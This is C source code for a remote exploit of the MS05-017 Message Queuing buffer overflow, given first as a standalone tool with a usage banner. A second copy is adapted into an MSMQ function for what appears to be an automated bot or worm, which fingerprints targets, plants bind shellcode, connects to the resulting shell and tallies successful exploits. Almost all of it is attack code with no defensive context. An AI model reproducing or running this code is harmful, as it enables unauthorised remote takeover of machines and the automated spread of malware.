int main (int argc, char **argv) { unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525"; unsigned char *packet = NULL; unsigned short bindport; unsigned long cnt; struct sockaddr_in addr; struct hostent *he; int len, cpkt = 1; int sockfd; char recvbuf[4096]; char *buff, *ptr; #ifdef _WIN32 WSADATA wsa; #endif printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n"); printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n"); if (argc < 5) { printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]); printf("\nMSMQ ports: 2103, 2105, 2107\n"); printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n"); exit(0); } #ifdef _WIN32 WSAStartup(MAKEWORD(2,0), &wsa); #endif if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); return 0; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] create socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons((short)atoi(argv[2])); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2])); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed!\n"); exit(0); } printf("OK\n"); packet = dce_rpc_bind(0, endp, 1, &cnt); if (send(sockfd, packet, cnt, 0) == -1) { printf("[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 0) { printf("[-] recv failed\n"); exit(0); } free(packet); printf("[*] Attacking..."); buff = (char *) malloc(4172); memset(buff, NOP, 4172); ptr = buff; memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1); ptr += sizeof(dce_rpc_header1)-1; // Remote NetBIOS name convert_name(ptr, argv[3]); ptr += strlen(argv[3])*2; memcpy(ptr, tag_private, sizeof(tag_private)-1); ptr += sizeof(tag_private)-1; memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1); // offsets ptr = buff; ptr += 438; memcpy(ptr, offsets, sizeof(offsets)-1); ptr += sizeof(offsets)-1; // shellcode bindport = (unsigned short)atoi(argv[4]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); buff[4170] = '\0'; buff[4171] = '\0'; if (argc == 6) cpkt = atoi(argv[5]); while (cpkt--) { printf("."); if (send(sockfd, buff, 4172, 0) == -1) { printf("\n[-] send failed\n"); exit(0); } } printf(" OK\n"); return 0; }
BOOL MSMQ(EXINFO exinfo) { if(!fNetWkstaGetInfo) { return FALSE; } char* cname; char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525"; char *packet = NULL; unsigned short bindport; unsigned long cnt; struct sockaddr_in addr; int len, cpkt = 1; int sockfd; char recvbuf[4096]; char *buff, *ptr; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE; addr.sin_family = AF_INET; addr.sin_port = fhtons(exinfo.port); addr.sin_addr.s_addr = finet_addr(exinfo.ip); memset(&(addr.sin_zero), '\0', 8); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; packet = dce_rpc_bind(0, endp, 1, &cnt); if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 0) { free(packet); return FALSE; } cname = GetRemoteComputerName(exinfo.ip); if(strlen(cname) == 0) { return FALSE; } buff = (char *) malloc(4172); memset(buff, NOP, 4172); ptr = buff; memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1); ptr += sizeof(dce_rpc_header1)-1; msmq_convert_name(ptr, cname); ptr += strlen(cname)*2; memcpy(ptr, tag_private, sizeof(tag_private)-1); ptr += sizeof(tag_private)-1; memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1); ptr = buff; ptr += 438; memcpy(ptr, offsets, sizeof(offsets)-1); ptr += sizeof(offsets)-1; int bp = brandom(1337,65535); bindport = (unsigned short)bp; bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); buff[4170] = '\0'; buff[4171] = '\0'; int TargetOS = FpHost(exinfo.ip, FP_RPC); if(TargetOS == OS_WIN2K) cpkt = 8; if(TargetOS == OS_WINXP) cpkt = 1; while (cpkt--) { if (fsend(sockfd, buff, 4172, 0) == -1) { return FALSE; } } fclosesocket(sockfd); Sleep(500); free(buff); if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;} return FALSE; }